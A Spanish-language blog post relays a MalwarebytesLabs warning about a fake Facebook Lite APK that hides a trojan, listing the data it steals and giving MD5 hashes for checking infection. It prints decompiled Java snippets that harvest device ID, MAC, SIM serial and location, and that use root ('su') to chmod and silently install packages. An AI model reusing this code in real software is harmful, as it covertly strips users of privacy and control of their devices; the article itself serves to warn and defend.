Un APK de Facebook Lite viene acompañado de malware
Desde el inicio de Android, han ido abriendo sus puertas otros mercados de aplicaciones completamente desvinculados del Play Store oficial. Desde Google siempre nos han recomendado que solo descarguemos aplicaciones de su Store, de no ser así podríamos estar instalando aplicaciones inseguras y que pondrían en peligro nuestra privacidad.
Este es el caso de Facebook Lite, el famoso cliente de Facebook que reduce el consumo de datos de conexión con la red social, pensado para gente con mala conexión a internet.
Contenido:
El problema
Desde MalwarebytesLabs alertan a los usuarios de la existencia de cierta aplicación que emula ser FacebookLite pero que en realidad esconde un troyano con el fin de leer datos del terminal para posteriormente enviarlos a un servidor remoto.
Según se informa se cree que podría ser de origen chino y registra ciertos datos como pueden ser:
- Fabricante y modelo
- Versión de Android
- Dirección MAC de la tarjeta de red
- Número de serie de la tarjeta SIM
- El ID del dispositivo
- La ubicación
Además, existe una parte del código dedicada a instalar otras aplicaciones en el dispositivo sin interacción del usuario.
¿Cómo funciona?
La falsa aplicación se compone de 2 partes:
- «com.google.update.GetInst» se inicia con el arranque del sistema y actúa como servicio de fondo. Una vez arrancado, este se encarga de iniciar un segundo paquete mediante Intents y Receivers.
- «com.google.update.LaunchReceiver» es el Receiver en cuestión, encargado de recopilar toda la información posible para enviarla a otro servidor. Y como comentaba arriba, capaz de instalar terceras aplicaciones de manera oculta. Las siguientes muestras de código se han recuperado desde la app.
WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo(); HashMap localHashMap = new HashMap(); localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId()); localHashMap.put("SystemVersion", Build.VERSION.RELEASE); localHashMap.put("Mac", localWifiInfo.getMacAddress()); localHashMap.put("PhoneType", Build.MODEL); localHashMap.put("NetworkOperatorName", paramTelephonyManager.getNetworkOperatorName()); localHashMap.put("SimSerialNumber", paramTelephonyManager.getSimSerialNumber()); localHashMap.put("Location", a());
localProcess = Runtime.getRuntime().exec("su"); PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream()); localPrintWriter.println("chmod 777 " + paramString); localPrintWriter.println("export LD_LIBRARY_PATH=/vendor/lib:/system/lib"); localPrintWriter.println("pm install -r " + paramString); localPrintWriter.flush(); localPrintWriter.close();
¿Porqué circula este tipo de malware?
Realmente, nadie nos puede asegurar que la aplicación que acabamos de descargar esté libre de malware. En contados casos, se han colado apps con malware en la Play Store durante unas pocas horas, hasta que el equipo de mantenimiento analiza y elimina la app sospechosa.
A pesar de ello, muchos usuarios descargan aplicaciones de Stores alternativas, con el riesgo que ello conlleva.
-«¿Porqué?».
Esto se debe a que muchas aplicaciones están restringidas en ciertos países, ya sea por cuestiones políticas, orientación de público etc… Esto genera usuarios descontentos que se buscan las castañas para encontrar y probar esa aplicación restringida en su país. Y para ello acaban recurriendo a estos mercados alternativos, donde otros usuarios que han podido descargarla de manera oficial filtran y comparten la aplicación.
Y voilá, tienes un dispositivo infectado!
Si has descargado Facebook Lite desde un mercado alternativo deberías verificar que tu APK no está infectado con dicho malware. Para ello comprueba que su hash MD5 no es igual a ninguno de estos 2:
- 5345429AB24BB132CFAACE51EFF63C84
- 628235E3C56651C72326D8F5C713DBC6
¿Te has encontrado con esta app en tu dispositivo? ¿Has podido desinstalarla sin problemas?
Compartelo con nosotros en los comentarios!